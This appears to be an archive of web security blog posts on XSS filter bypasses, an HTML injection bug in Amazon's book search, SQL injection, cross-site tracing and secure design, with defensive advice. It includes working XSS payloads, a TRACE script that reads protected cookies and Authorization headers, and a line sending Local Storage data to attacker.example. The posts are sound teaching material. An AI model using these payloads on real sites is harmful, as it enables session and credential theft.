Posts below have been edited and updated from their original version. More entries are in the archive.

* * *
  • Just as there can be appsec truths, there can be appsec laws.

    Science fiction author Arthur C. Clarke succinctly described the wondrous nature of technology in what has come to be known as Clarke’s Third Law (from a letter published in Science in January 1968):

    Any sufficiently advanced technology is indistinguishable from magic.

    The sentiment of that law can be found in an earlier short story by Leigh Brackett, “The Sorcerer of Rhiannon,” published in Astounding Science-Fiction Magazine in February 1942:

    Witchcraft to the ignorant… Simple science to the learned.

    With those formulations as our departure point, we can now turn towards crypto, browser technologies, and privacy.

    The Latinate Lex Cryptobellum:

    Any sufficiently advanced cryptographic escrow system is indistinguishable from ROT13.

    Or in Leigh Brackett’s formulation:

Cryptographic escrow to the ignorant… Simple plaintext to the learned.

    A few Laws of Browser Plugins:

    Any sufficiently patched Flash is indistinguishable from a critical update.

    Any sufficiently patched Java is indistinguishable from Flash.

    A few Laws of Browsers:

    Any insufficiently patched browser is indistinguishable from malware.

    Any sufficiently patched browser remains distinguishable from a privacy-enhancing one.

    For what are browsers but thralls to Laws of Ads:

    Any sufficiently targeted ad is indistinguishable from chance.

    Any sufficiently distinguishable person’s browser has tracking cookies.

    Any insufficiently distinguishable person has privacy.

    Writing against deadlines:

    Any sufficiently delivered manuscript is indistinguishable from overdue.

    Which leads us to the foundational Zeroth Law of Content:

    Any sufficiently popular post is indistinguishable from truth.

    * * *
  • I know what you’re thinking.

    “Did my regex block six XSS attacks or five?”

    You’ve got to ask yourself one question: “Do I feel lucky?”

    Well, do ya, punk?

    Maybe you read a few HTML injection (cross-site scripting) tutorials and think a regex solves this problem. Maybe. Let’s revisit that thinking. We’ll need an attack vector. It could be a URL parameter, form field, header, or any other part of an HTTP request.

    Choose an Attack Vector

    Many web apps implement a search functionality. That’s an ideal attack vector because the nature of a search box is to accept an arbitrary string, then display the search term along with any relevant results. It’s the display, or reflection, of the search term that often leads to HTML injection.

    For example, the following screenshot shows how Google reflects the search term “html injection attack” at the bottom of its results page. And the text node created in the HTML source.

[Screenshots: Google search box, the results page reflecting the search term, and the corresponding HTML source]

    Here’s another example that shows how Twitter reflects the search term “deadliestwebattacks” in its results page. And the text node created in the HTML source.

[Screenshots: Twitter search results and the corresponding HTML source]

    Let’s take a look at another site with a search box. Don’t worry about the text (it’s a Turkish site, the words are basically “search” and “results”). First, we try a search term, “foo”, to check if the site echoes the term into the response’s HTML. Success! It appears in two places: a title attribute and a text node.

    <a title="foo için Arama Sonuçları">Arama Sonuçları : "foo"</a>
    

    Next, we probe the page for tell-tale validation and output encoding weaknesses that indicate the potential for this vulnerability to be present. In this case, we’ll try a fake HTML tag, <foo/>.

    <a title="<foo/> için Arama Sonuçları">Arama Sonuçları : "<foo/>"</a>
    

The site inserts the tag directly into the response. The <foo/> tag is meaningless for HTML, but the browser recognizes that it has the correct mark-up for a self-closing tag. Looking at the rendered version displayed by the browser confirms this:

    Arama Sonuçları : ""
    

    The <foo/> term isn’t displayed because the browser interprets it as a tag. It creates a DOM node of <foo> as opposed to placing a literal <foo/> into the text node between <a> and </a>.
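
A modern browser console can confirm this parsing behavior with DOMParser (a sketch added for illustration; it wasn't part of the original test):

    // Parse the reflected markup the same way the browser does.
    const doc = new DOMParser().parseFromString(
        '<a title="foo için Arama Sonuçları">Arama Sonuçları : "<foo/>"</a>',
        'text/html');
    console.log(doc.querySelector('foo')); // a real <foo> element node
    console.log(doc.body.textContent);     // Arama Sonuçları : ""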

    Inject a Payload

    The next step is to find a tag with semantic meaning for a browser. An obvious choice is to try <script> as a search term since that’s the containing element for JavaScript.

    <a title="<[removed]> için Arama Sonuçları">Arama Sonuçları : "<[removed]>"</a>
    

The site’s developers seem to be aware of the risk of writing raw <script> elements into search results. In the title attribute, they replaced the angle brackets with HTML entities and replaced “script” with “[removed]”.

    A good hacker would continue to probe the search box with different kinds of payloads. Since it seems impossible to execute JavaScript within a <script> element, we’ll try JavaScript execution within the context of an element’s event handler.

    Try Alternate Payloads

    Here’s a payload that uses the onerror attribute of an <img> element to execute a function:

    <img src="x" onerror="alert(9)">
    

    We inject the new payload and inspect the page’s response. We’ve completely lost the attributes, but the element was preserved:

    <a title="<img> için Arama Sonuçları">Arama Sonuçları : "<img>"</a>
    

So, let’s modify our payload a bit. We condense it to a format that remains valid (i.e. a browser interprets it and it doesn’t violate the HTML spec). This step just demonstrates an alternate syntax with the same semantic meaning.

    <img/src="x"onerror=alert(9)>
    

[Screenshot: the condensed payload entered in the search box]

Unfortunately, the site stripped the onerror handler the same way it did for the <script> tag.

    <a title="<img/src="x"on[removed]=alert(9)>">Arama Sonuçları :
        "<img/src="x"on[removed]=alert(9)>"</a>
    

    Additional testing indicates the site apparently does this for any of the onfoo event handlers.

    Refine the Payload

    We’re not defeated yet. The fact that the site is looking for malicious content implies that it’s relying on regular expressions to deny list common attacks.

    Oh, how I love regexes. I love writing them, optimizing them, and breaking them. Regexes excel at pattern matching, but fail miserably at parsing. And parsing is fundamental to working with HTML.

    So, let’s unleash a mighty anti-regex hack. I’d call for a drum roll to build the suspense, but the technique is too trivial for that. All we do is add a greater than (>) symbol:

    <img/src="x>"onerror=alert(9)>
    

[Screenshot: the anti-regex payload entered in the search box]

    Look what happens to the site. We’ve successfully injected an <img> tag. The browser parses the element, but it fails to load the image called x> so it triggers the error handler, which pops up a friendly alert.

    <a title="<img/src=">"onerror=alert(9)> için Arama Sonuçları">Arama Sonuçları :
        "<img/src="x>"onerror=alert(9)>"</a>
    

[Screenshot: the alert(9) dialog triggered by the payload]

    Why does this happen? I don’t have first-hand knowledge of the specific regex, but I can guess at its intention.

HTML tags start with the < character, followed by an alpha character, followed by zero or more attributes (with tokenization properties that create things like name/value pairs), and close with the > character. It’s likely the regex was only searching for “on…” handlers within the context of an element, i.e. between < and > (the start and end tokens). A > character inside an attribute value doesn’t close the element: <tag attribute="x>" ... onevent=code>.

The browser’s parsing model understood the quoted string was a value token. It correctly handled the state transitions between element start, element name, attribute name, attribute value, and so on. The parser consumed each character and interpreted it based on the context of its current state.

    The site’s poorly-formed regex didn’t create a sophisticated enough state machine to handle the x> properly. (Regexes have their own internal state machines for pattern matching. I’m referring to the pattern’s implied state machine for HTML.) It looked for a start token, then switched to consuming characters until it found an event handler or encountered an end token – ignoring the possible interim states associated with tokenization based on spaces, attributes, or invalid markup.
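
To make the failure concrete, here’s a minimal sketch of the kind of deny-list pattern the site might have used (the actual filter is unknown; this regex is an assumption):

    // Looks for an "on..." handler between < and >, so it never scans past
    // a > character - even one sitting harmlessly inside a quoted value.
    const denyList = /<[a-z][^>]*\bon\w+\s*=/i;

    console.log(denyList.test('<img/src="x"onerror=alert(9)>'));  // true: blocked
    console.log(denyList.test('<img/src="x>"onerror=alert(9)>')); // false: bypassed

The browser tracks attribute-value state and treats the quoted x> as data; the regex tracks nothing and treats the > as the end of the element.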

    This was only a small step into the realm of HTML injection. For example, the web site reflected the payload on the immediate response to the attack’s request. In other scenarios the site might hold on to the payload and insert it into a different page. It’s still reflected by the site, but not on the immediate response. That would make it a persistent type of vuln because the attacker does not have to re-inject the payload each time the affected page is viewed. For example, lots of sites have phrases like, “Welcome back, Mike!”, where they print your first name at the top of each page. If you told the site your name was <script>alert(9)</script>, then you’d have a persistent HTML injection exploit.

    Rethink Defense

    For developers:

• When user-supplied data is placed in a web page, encode it for the appropriate context; a short sketch follows this list. For example, use percent-encoding (e.g. < becomes %3c) for an href attribute; use HTML entities (e.g. < becomes &lt;) for text nodes.
    • Prefer inclusion lists (match what you expect) to exclusion lists (predict what you think should be blocked).
    • Work with a consistent character encoding. Unpredictable transcoding between character sets makes it harder to ensure validation filters treat strings correctly.
    • Prefer parsing to pattern matching. However, pre-HTML5 parsing has its own pitfalls, such as browsers’ inconsistent handling of whitespace within tag names. HTML5 codified explicit rules for acceptable markup.
    • If you use regexes, test them thoroughly. Sometimes a “dumb” regex is better than a “smart” one. In this case, a dumb regex would have just looked for any occurrence of “onerror” and rejected it.
    • Prefer to reject invalid input rather than massage it into something valid. This avoids a cuckoo-like attack where a single-pass filter would remove any occurrence of the word “script” from a payload like <scrscriptipt>, unintentionally creating a <script> tag.
• Prefer to reject invalid character code points (and unexpected encoding) rather than substitute or strip characters. This prevents attacks like null-byte insertion, e.g. stripping null from <%00script> after performing the validation check, overlong UTF-8 encoding, e.g. %c0%bcscript%c0%bd, or Unicode encoding (when expecting UTF-8), e.g. %u003cscript%u003e.
    • Escape metacharacters correctly.
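
Here’s a minimal sketch of the first item’s advice for the text-node context (the function name and entity set are illustrative, not a standard API):

    // Encode HTML metacharacters as entities before writing user data
    // into a text node or quoted attribute value.
    function encodeForHtml(s) {
        return s.replace(/&/g, '&amp;')
                .replace(/</g, '&lt;')
                .replace(/>/g, '&gt;')
                .replace(/"/g, '&quot;')
                .replace(/'/g, '&#x27;');
    }

    // The payload from earlier renders as inert text instead of markup.
    console.log(encodeForHtml('<img/src="x>"onerror=alert(9)>'));
    // &lt;img/src=&quot;x&gt;&quot;onerror=alert(9)&gt;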

    For more examples of payloads that target different HTML contexts or employ different anti-regex techniques, check out the HTML Injection Quick Reference (HIQR). In particular, experiment with different payloads from the “Anti-regex patterns” at the bottom of Table 2.

    * * *
[Image: iPhone zombie]

    This is how it began. Over two years ago I unwittingly planted the seeds of an undead horde into the pages of my book, Seven Deadliest Web Application Attacks.

    Only recently did I discover the rotted fruit of those seeds festering within the pages of Amazon.

    • Visit the book’s Amazon page.
    • Click on the “Look Inside!” feature.
    • Use the “Search Inside This Book” function to search for zombie.
• Cower before the approaching mass of flesh-hungry brutes. Or just click OK a few times.

    On page 16 of the book there is an example of an HTML element’s syntax that forgoes the typical whitespace used to separate attributes. The element’s name is followed by a valid token separator, albeit one rarely used in hand-written HTML. The printed text contains this line:

    <img/src="."alt=""onerror="alert('zombie')"/>
    

[Screenshot: the onerror alert('zombie') dialog]

    The “Search Inside” feature lists the matches for a search term. It makes the search term bold (i.e. adds <b> markup) and includes the context in which the search term was found (hence the surrounding text with the full <img/src="."alt="" /> element). Then it just pops the contextual find into the list, to be treated as any other “text” extracted from the book.

    <img src="." alt="" onerror="alert('<b>zombie</b>')"/>
    

    Finally, the matched term is placed within an anchor so you can click on it to find the relevant page. Notice that the <img> tag hasn’t been inoculated with HTML entities; it’s a classic HTML injection attack.

    <a ... href="javascript:void(0)">
    <span class="sitbReaderSearch-result-page">Page 16 ...t require spaces to
        delimit their attributes.
        **<img src="." alt="" onerror="alert('<b>zombie</b>')"/>** JavaScript
        doesn't have to...
    

    This has actually happened before. In December 2010 a researcher in Germany, Dr. Wetter, reported the same effect via <script> tags when searching for content in different security books. He even found <script> tags whose src attribute pointed to a live host, which made the flaw infinitely more entertaining.

[Image: iPad zombie]

In fact, this was such a clever example of an unexpected vector for HTML injection that I included Dr. Wetter’s findings in the new Hacking Web Apps book (pages 40 and 41; the same <img...onerror> example shows up a little later on page 59). Behold, there’s a different infestation on page 31. Try searching for zombie again. This time the server responds with a JSON payload that contains straightforward <script> tags. This one was more tedious to track down. The <script> tags don’t appear in the search listing, but they do exist in the excerpt property of the JavaScript object that carries the match context, applies the bold markup, and so on:

    {...,"totalResults":2,"results":[[52,"Page 31","... encoded characters with
    their literal values:  <a href=\"http://\"/>**<script>alert('<b>zombie</b>')
    </script>**@some.site/\">search again</a>   Abusing the authority component
    of a ...", ...}
    

    I only discovered this injection flaw when I recently searched the older book for references to the living dead. (Yes, a weird – but true – reason.)

    How did this happen?

    One theory is that an anti-XSS filter relied on a deny list to catch potentially malicious tags. In this case, the <img> tag used a valid, but uncommon, token separator that would have confused any filter expecting whitespace delimiters. One common approach to regexes is to build a pattern based on what we think browsers know. For example, a quick filter to catch <script> tags or opening tags (e.g. <iframe src...> or <img src...>) might look like this:

<[[:alpha:]]+(\s+|>)
    

    A payload like <img/src> bypasses the regex and the browser correctly parses the syntax to create an image element. Of course, the src attribute fails to resolve, thereby triggering the onerror event handler, leading to yet another banal alert() declaring the presence of an HTML injection attack.
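
Translated into a JavaScript regex for illustration ([[:alpha:]] is POSIX syntax, so [A-Za-z] stands in here; this is a sketch, not the site’s actual filter):

    // Expects whitespace or > right after the tag name,
    // so a / token separator slips past unexamined.
    const filter = /<[A-Za-z]+(\s+|>)/;

    console.log(filter.test('<img src="x" onerror=alert(9)>')); // true: caught
    console.log(filter.test('<img/src="x"onerror=alert(9)>'));  // false: bypassed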

The <script> example is less clear without knowing more about the internals of the site. Perhaps a sequence of quote-stripping steps and buggy regexes misunderstood the href to actually contain an authority section? I don’t have a good guess for this one.

    This highlights one problem of relying on regexes to parse a grammar like HTML. Yes, it’s possible to create strong, effective regexes. However, a regex does not represent the parsing state machine of browsers, including their quirks, exceptions, and “fix-up” behaviors. Fortunately, HTML5 brings a measure of sanity to this mess by clearly defining rules of interpretation. On the other hand, web history foretells that we’ll be burdened with legacy modes and outdated browsers for years to come. So, be wary of those regexes.

    No. That’s not it.

    How did this really happen?

Well, I listen to various music while I write. You might argue that it was the demonic influence (or awesome Tony Iommi riffs) of Black Sabbath that ensorcelled the pages, or that Judas Priest made me do it. Or that March 30, 2010 – right around the book’s release – was a full moon. Maybe in one of Amazon’s vast, diversely stocked warehouses an oil drum with military markings spilled over, releasing a toxic gas that infected the books. Me? I think we’ll never know.

    Maybe one day we’ll be safe from this kind of attack. HTML5 and Content Security Policy make more sandboxes and controls available for implementing countermeasures. But I just can’t shake the feeling that somehow, somewhere, there’re more lurking about.

    Until then, the most secure solution is to –

    – wait, what’s that noise at the door…?

    They're coming to get you, Barbara.

    * * *
  • In which an exposition of Twelve Web (In)Security Truths begins.

    #1 – Software execution is less secure than software design, but running code has more users.

A site you send people to visit is infinitely more usable than the one you describe to people. (Value differs from usability. Before social media flamed out, you could raise $41 million on a slide deck.) Talk all you want, but eventually someone wants you to deliver.

    Sure, you could describe Twitter as a glorified event loop around an echo server. You might even replicate it in a weekend with a few dozen lines of Python or Node.js and an EC2 instance. Just try scaling that napkin design to a few hundred million users while keeping security and privacy controls in place. That’s a testament to implementing a complex design. (Or scaling a simple design if you boil it down to sending and receiving tweets.)

It’s possible to attain impressive security through careful design. A prominent example in cryptography is the “perfect secrecy”1 of the One-Time Pad (OTP). The first OTP appeared in 1882, designed in an era without the codified information theory or cryptanalysis of Claude Shannon and Alan Turing.2 Nevertheless, its design understood the threats to confidential communications when telegraphs and Morse code carried secrets instead of fiber optics and TCP/IP. Sadly, good designs are sometimes forgotten or their importance unrecognized. The OTP didn’t gain popular usage until its re-invention in 1917, along with a more rigorous proof of its security.

But security also suffers when design becomes implementation. The OTP fails miserably if a pad is reused or insufficiently random. The pad must be as long as the input to be ciphered. So, if you’re able to securely distribute a pad (remember, the pad must be unknown to the attacker), then why not just distribute the original message? Once someone introduces a shortcut in the name of efficiency or cleverness the security breaks. (Remember the Debian OpenSSL debacle?) This is why it’s important to understand the reasons for a design rather than treat it as a logic table to be condensed like the singularity of a black hole. Otherwise, you might as well use two rounds of ROT13.

Web security has its design successes. Prepared statements are a prime example of a programming pattern that should have relegated SQL injection to the CVE graveyard. Avoiding them is inexcusable. Only devotees of Advanced Persistent Ignorance continue to blithely glue SQL statements together with string concatenation. SQL injection is so well-known (at least by hackers) and studied that a venerable tool like sqlmap has been refining exploitation for over six years. The X-Frame-Options header is another example of design that could dispatch a whole class of vulnerabilities (i.e. clickjacking).
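
For illustration, here’s a minimal sketch of the pattern using Node.js and the mysql2 library (my choice of driver for the example, not one the post prescribes):

    // The ? placeholder sends the user-supplied value separately from the
    // SQL text, so a stray quote can't rewrite the statement.
    const mysql = require('mysql2/promise');

    async function findUser(pool, name) {
        const [rows] = await pool.execute(
            'SELECT id, name FROM users WHERE name = ?',
            [name]
        );
        return rows;
    }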

O, but how the Internet loves to re-invent vulns. Whether or not SQL injection is in its death throes, NoSQL injection promises to reanimate its bloated corpse. Herbert West would be proud.

Sometimes software repeats the mistakes of other projects without considering or acknowledging the reasons for those mistakes. The Ruby on Rails Mass Assignment feature is reminiscent of PHP’s register_globals issues. Both PHP and Ruby on Rails are Open Source projects with large communities. It’s unfair to label the entire group as ignorant of security. But the question of priorities has to be considered. Do you have a default stance of high or low security? Do you have language features whose behavior changes based on configuration settings outside the developer’s control, or that always have predictable behavior?

    Secure design isn’t always easy. Apache’s reverse proxy/mod_rewrite bug went through a few iterations and several months of discussion before Apache developers arrived at an effective solution. Once again, you might argue that the problem lies with users (i.e. poor rewrite rules that omit a path component) rather than the software. Still, the vuln proved how difficult it is to refine security for complex situations.

    HTML injection is another bugbear of web security. (Which makes SQL injection the owlbear?) There’s no equivalent to prepared statements for building HTML on the fly; developers must create solutions for their programming language and web architecture. That doesn’t mean XSS isn’t preventable, prevention just takes more effort and more attention to the context where user-influenced data shows up in a page. Today’s robust JavaScript frameworks help developers avoid many of the XSS problems that arise from haphazard construction of HTML on the server.

    There’s hope on the horizon for countering HTML injection with design principles that are tied to HTTP Headers rather than a particular programming language or web framework. The Content Security Policy (CSP) has moved from a Mozilla effort to a standard for all browsers. CSP won’t prevent HTML injection from occurring, but it will diminish its exploitability because developers will be able to give browsers directives that prevent script execution, form submission, and more. CSP even has the helpful design feature of a monitor or enforce mode, thereby easing the transition to a possibly complex policy.
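
A sketch of what such a policy header might look like (directive values are illustrative; report-uri was the reporting mechanism of the era):

    Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self'; report-uri /csp-report

Renaming the header to Content-Security-Policy switches the same policy from monitor to enforce mode.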

    Design is how we send whole groups of vulns to the graveyard. Good security models understand the threats a design counters as well as those it does not. Spend too much time on design and the site will never be implemented. Spend too much time on piecemeal security and you risk blocking obscure exploits rather than fundamental threats.

As the ancient Fremen saying goes, “Truth suffers from too much analysis.”3 So too does design suffer in the face of scrutiny based on unspecific or unreasonable threats. It’s important to question the reasons behind a design and the security claims it makes. Sure, HSTS relies on the frail security of DNS. Yet HSTS is a significant improvement to HTTPS, which in turn is unquestionably better than HTTP. But if you refuse to implement an imperfect solution in favor of preserving the status quo of HTTP, then you haven’t fully considered the benefits of encryption.

    Nor are security checklists absolute. The httponly attribute prevents no vulnerabilities. It only prevents JavaScript from accessing a cookie. Blindly following the mantra that httponly must exist on all cookies ignores useful designs where JavaScript intentionally reads and writes cookie values. If you’ve put sensitive data into a Local Storage object, then an XSS vuln is going to expose all that tasty data to a hacker who cares little for the cookie’s accessibility.
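
To illustrate that last point, a sketch of what an injected script could do (attacker.example is a placeholder):

    // httponly may shield the cookie, but Local Storage is one synchronous
    // call away for any script running in the page's origin.
    var stolen = JSON.stringify(Object.assign({}, localStorage));
    new Image().src = 'https://attacker.example/c?d=' + encodeURIComponent(stolen);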

    Design your way to a secure concept, code your way to a secure site. When vulnerabilities arise determine if they’re due to flaws in the design or mistakes in programming. A design that anticipates vulnerabilities (e.g. parameterized queries) should make it easy to fix inevitable bugs. Vulnerabilities that surprise developers should lead to design changes that provide more flexibility for resolving the problem. Inflexibility, whether in design or in code, is dangerous to security. Just like the Bene Gesserit say, “Any road followed precisely to its end leads precisely nowhere.”4


    1. In the sense of Claude Shannon’s “Communication Theory of Secrecy Systems”. 

2. As Steven Bellovin notes in his paper, an 1882 codebook contains an amusingly familiar phrase regarding identity questions: “Identity can be established if the party will answer that his or her mother’s maiden name is…” It seems identity proofs haven’t changed in 130 years!

    3. Frank Herbert. Dune Messiah. p. 81. 

    4. Frank Herbert. Dune. p. 69. 

    * * *
  • My current writing project has taken time away from adding new content lately. Here’s a brief interlude of The Twelve Web Security Truths I’ve been toying with as a side project. They are modeled on The Twelve Networking Truths from RFC 1925.

    1. Software execution is less secure than software design, but executing code attracts actual users.
    2. The time saved by not using parameterized queries to build SQL statements should be used to read about using parameterized queries.
    3. Same Origin Policy restricts the DOM access and JavaScript behavior of content loaded from multiple origins. Malware only cares about plugin and browser versions.
4. Content with XSS vulns is affected by the Same Origin Policy, which is nice for XSS attacks that inject into the site’s origin.
    5. CSRF countermeasures like Origin headers mitigate CSRF, not XSS. Just like X-Frame-Options mitigates clickjacking, not XSS.
    6. Making data safe for serialization with JSON does not make the data safe for the site.
    7. There are four HTML injection vulns in your site today. Hackers will find two of them, the security team will find one, the dev team will introduce another one tomorrow.
    8. Deny lists miss the attack payload that works.
    9. A site that secures user data still needs to work on the privacy of user data.
    10. Hashing passwords with 1,000-round PBKDF2 increases the work factor to brute force the login page by a factor of 1. Increasing this to a 10,000-round PBKDF2 scheme provides an additional increase by a factor of 1.
    11. The vulnerabilities in “web 2.0” sites occur against the same HTML and JavaScript capabilities of “web 1.0” sites. HTML5 makes this different in the same way.
    12. A site is secure when a compromise can be detected, defined, and fixed with minimal effort and users are notified about it.
    13. Off-by-one errors only happen in C.
    * * *
  • The biggest threat to modern web applications is someone who exhibits Advanced Persistent Ignorance. Developers rely on all sorts of APIs to build complex software. This one makes code insecure by default. API is the willful disregard of simple, established security designs.

First, we must step back into history to establish a departure point for ignorance. This is just one of many. Almost seven years ago, on July 13, 2004, PHP 5.0.0 was officially released. Importantly, it included this note:

    A new MySQL extension named MySQLi for developers using MySQL 4.1 and later. This new extension includes an object-oriented interface in addition to a traditional interface; as well as support for many of MySQL’s new features, such as prepared statements.

    Of course, any new feature can be expected to have bugs and implementation issues. Even with an assumption that serious bugs would take a year to be worked out, that means PHP has had a secure database query mechanism for the past six years.1

The first OWASP Top 10 list from 2004 mentioned prepared statements as a countermeasure.2 Along with PHP and MySQL, .NET and Java supported these, as did Perl (before its popularity was subsumed by buzzword-building Python and Ruby on Rails). In fact, PHP and MySQL trailed other languages and databases in their support for prepared statements.

    SQL injection itself predates the first OWASP Top 10 list by several years. One of the first summations of the general class of injection attacks was the 1999 Phrack article, Perl CGI problems. SQL injection was simply a specialization of these problems to database queries.

    So, we’ve established the age of injection attacks at over a dozen years old and reliable countermeasures at least six years old. These are geologic timescales for the Internet.

    There’s no excuse for SQL injection vulnerabilities to exist in 2011.

It’s not a forgivable coding mistake anymore. Coding mistakes most often imply implementation errors – bugs due to typos, forgetfulness, or syntax. Modern SQL injection vulns are a sign of bad design. For six years, prepared statements have offered a means of establishing a fundamentally secure design for database queries. It takes actual effort to make them insecure. SQL injection attacks could still happen against a prepared statement, but only due to egregiously poor code that shouldn’t pass a basic review. (Yes, yes, stored procedures can be broken, too. String concatenation happens all over the place. Nevertheless, writing an insecure stored procedure or prepared statement should be more difficult than writing an insecure raw SQL statement.)

    Maybe one of the two billion PHP hobby projects on Sourceforge could be expected to still have these vulns, but not real web sites. And, please, never in sites for security firms. Let’s review the previous few months:

The list may seem meager, but there’s an abundance of sites that have had SQL injection vulns. We just don’t have a crowdsourced tracker for them the way xssed.org tracks cross-site scripting.

    XSS is a little more forgivable, though no less embarrassing. HTML injection flaws continue to plague sites because of implementation bugs. There’s no equivalent of the prepared statement for building HTML or HTML snippets. This is why the vuln remains so pervasive: No one has figured out the secure, reliable, and fast way to build HTML with user-supplied data. This doesn’t imply that attempting to do so is a hopeless cause. On the contrary, JavaScript libraries can reduce these problems significantly.

    For all the articles, lists, and books published on SQL injection one must assume that developers are being persistently ignorant of security concepts to such a degree that five years from now we may hear yet again of a database hack that disclosed unencrypted passwords.

If you’re going to use performance as an excuse for avoiding prepared statements, then you either haven’t bothered to measure the impact or you haven’t understood how to scale web architectures, and you might as well turn off HTTPS for the login page so you can get more users logging in per second. If you have other excuses for avoiding database security, ask yourself if it takes longer to write a ranting rebuttal or a wrapper for secure database queries.

There may in fact be hope for the future. The rush to scalability and the pious invocation of “cloud” has created a new beast of NoSQL datastores. These NoSQL datastores typically just have key-value pairs with grammars that aren’t so easily corrupted by a stray apostrophe or semi-colon in the way that traditional SQL can be corrupted. Who knows, maybe security conferences will finally do away with presentations on yet another SQL injection exploit and find someone with a novel NoSQL Injection vulnerability.

    Advanced Persistent Ignorance isn’t limited to SQL injection vulnerabilities. It has just spectacularly manifested itself in them. There are many unsolved problems in information security, but there are also many mostly-solved problems. Big unsolved problems in web security are password resets (overwhelmingly relying on email) and using static credit card numbers to purchase items.

    SQL injection countermeasures are an example of a mostly-solved problem. Using prepared statements isn’t 100% secure, but it makes a significant improvement. User authentication and password storage is another area of web security rife with errors. Adopting a solution like OpenID can reduce the burden of security around authentication. As with all things crypto-related, using well-maintained libraries and system calls are far superior to writing your own hash function or encryption scheme.

    Excuses that prioritize security last in a web site design miss the point that not all security has to be hard. Nor does it have to impede usability or speed of development. Crypto and JavaScript libraries provide high-quality code primitives to build sites. Simple education about current development practices goes just as far. Sometimes the state of the art is actually several years old – because it’s been proven to work.

    The antidote to API is the continuous acquisition of knowledge and experience. Have some cake.


    1. MySQL introduced support for prepared statements in version 4.1, which was first released April 3, 2003. 

    2. https://www.owasp.org/index.php/A6_2004_Injection_Flaws 

    * * *
  • In January 2003 Jeremiah Grossman disclosed a method to bypass the HttpOnly1 cookie restriction. He named it Cross-Site Tracing (XST), unwittingly starting a trend to attach “cross-site” to as many web-related vulnerabilities as possible.

    Alas, the “XS” in XST evokes similarity to XSS (Cross-Site Scripting) which has the consequence of leading people to mistake XST as a method for injecting JavaScript. (Thankfully, character encoding attacks have avoided the term Cross-Site Unicode, XSU.) Although XST attacks rely on browser scripting to exploit the vulnerability, the vulnerability is not the injection of JavaScript. XST is a means for accessing headers normally restricted from JavaScript.

    Confused yet?

    First, review XSS. XSS vulnerabilities, better described as HTML injection, occur because a web application echoes an attacker’s payload within the HTTP response body – the HTML. This enables the attacker to modify a page’s DOM by injecting characters that affect the HTML’s layout, such as adding spurious characters like brackets (< and >) and quotes (' and "). Cross-site tracing relies on HTML injection to craft an exploit within the victim’s browser, but this implies that an attacker already has the capability to execute JavaScript. So, XST isn’t about injecting <script> tags into the browser; the attacker must already be able to do that.

Cross-site tracing takes advantage of the fact that a web server should reflect the client’s HTTP message in its response.2 The common misunderstanding of an XST attack’s goal is that it uses a TRACE request to cause the server to reflect JavaScript in the HTTP response body that the browser would consequently execute. As the following example shows, this is in fact what happens even though the reflection of JavaScript isn’t the real vulnerability. The green and red text indicates the response body. The request was made with netcat.

[Screenshot: a TRACE request sent with netcat and the server’s reflected response]
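
In rough outline the exchange looks like this (host name and header are illustrative; per the RFC, the server echoes the request in a message/http body):

    $ nc test.lab 80
    TRACE / HTTP/1.1
    Host: test.lab
    X-Test: <script>alert(42)</script>

    HTTP/1.1 200 OK
    Content-Type: message/http

    TRACE / HTTP/1.1
    Host: test.lab
    X-Test: <script>alert(42)</script>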

    The reflection of <script> tags is immaterial (the RFC even says the server should reflect the request without modification). The real outcome of an XST attack is that it exposes HTTP headers normally inaccessible to JavaScript.

    Let that sink in for a moment. XST attacks use the TRACE (or synonymous TRACK) method to read HTTP headers that are otherwise blocked from JavaScript access.

For example, the HttpOnly attribute of a cookie is supposed to prevent JavaScript from reading that cookie’s properties. The Authorization header, which for HTTP Basic Auth is simply the Base64-encoded username and password, is not part of the DOM and is not directly readable by JavaScript.

No cookie values or auth headers showed up when we made the request via netcat because, obviously, netcat doesn’t have the internal state a browser does. So, take a look at the server’s response when a browser’s XHR object is used to make the same TRACE request. This is the snippet of JavaScript:

// Synchronous TRACE request; the browser transparently attaches
// its own Authorization and Cookie headers before sending.
var xhr = new XMLHttpRequest();
xhr.open('TRACE', 'https://test.lab/', false);
xhr.send(null);
// The response body is the server's echo of the request, headers and all.
if (200 == xhr.status)
    alert(xhr.responseText);
    

    The following image shows one possible response. Notice the text in red. The browser added the Authorization and Cookie headers to the XHR request, which have been reflected by the server:

[Screenshot: the TRACE response reflecting the browser’s Authorization and Cookie headers, shown in red]

    Now we see that both an HTTP Basic Authentication header and a cookie value have shown up in the response text. A simple JavaScript regex could extract these values, bypassing the normal restrictions imposed on script access to headers or protected cookies. The drawback for attackers is that modern browsers (such as the ones that have moved into this decade) are savvy enough to block TRACE requests through the XMLHttpRequest object, which leaves the attacker to look for alternate capabilities in plug-ins like Flash.
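
For example, a sketch continuing the snippet above:

    // Pull the reflected Cookie header out of the echoed request text.
    var match = /^Cookie:\s*(.+)$/mi.exec(xhr.responseText);
    if (match) {
        // A real attack would exfiltrate the value; alert() stands in here.
        alert(match[1]);
    }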

This is the real vulnerability associated with cross-site tracing: peeking at header values. The exploit would be impossible without the ability to inject JavaScript in the first place.3 Therefore, its real impact (or threat, depending on how you define these terms) is exposing sensitive header data. Hence, alternate names for XST could be TRACE disclosure attack, TRACE header reflection, TRACE method injection (TMI), or TRACE header & cookie (THC) attack.

    We’ll see if any of those actually catch on for the next OWASP Top 10 list.


1. HttpOnly was introduced by Microsoft in Internet Explorer 6 Service Pack 1, which was released September 9, 2002. It was created to mitigate, not block, XSS exploits that explicitly attacked cookie values. It wasn’t a method for preventing HTML injection (aka cross-site scripting or XSS) vulnerabilities from occurring in the first place. Mozilla magnanimously adopted it in Firefox 2.0.0.5 four and a half years later. 

    2. Section 9.8 of the HTTP/1.1 RFC

    3. Security always has nuanced exceptions. Merely requesting TRACE /<script>alert(42)</script> HTTP/1.0 might be stored in the web server’s log file or a database. If some log parsing tool renders requests like this to a web page without filtering the content, then HTML injection once again becomes possible. This is often referred to as second order XSS – when a payload is injected via one application, stored, then rendered by a separate web app. 

    * * *
  • The Hacking Web Apps book covers HTML Injection and cross-site scripting (XSS) in Chapter 2. Within the restricted confines of the allotted page count, it describes one of the most pervasive attacks that plagues modern web applications.

    Yet XSS is old. Very, very old. Born in the age of acoustic modems barely a Planck Era after the creation of the web browser.

    Early descriptions of the attack used terms like “malicious HTML” or “malicious JavaScript” before the phrase “cross-site scripting” became canonized by the OWASP Top 10. While XSS is an easy point of reference, the attack could be more generally called HTML injection because an attack does not have to “cross sites” or rely on JavaScript to be successful. The infamous Samy attack didn’t need to leave the confines of MySpace (nor did it need to access cookies) to effectively DoS the site within 24 hours. And persistent XSS is just as dangerous if an attacker injects an iframe that points to a malware site – no JavaScript required.

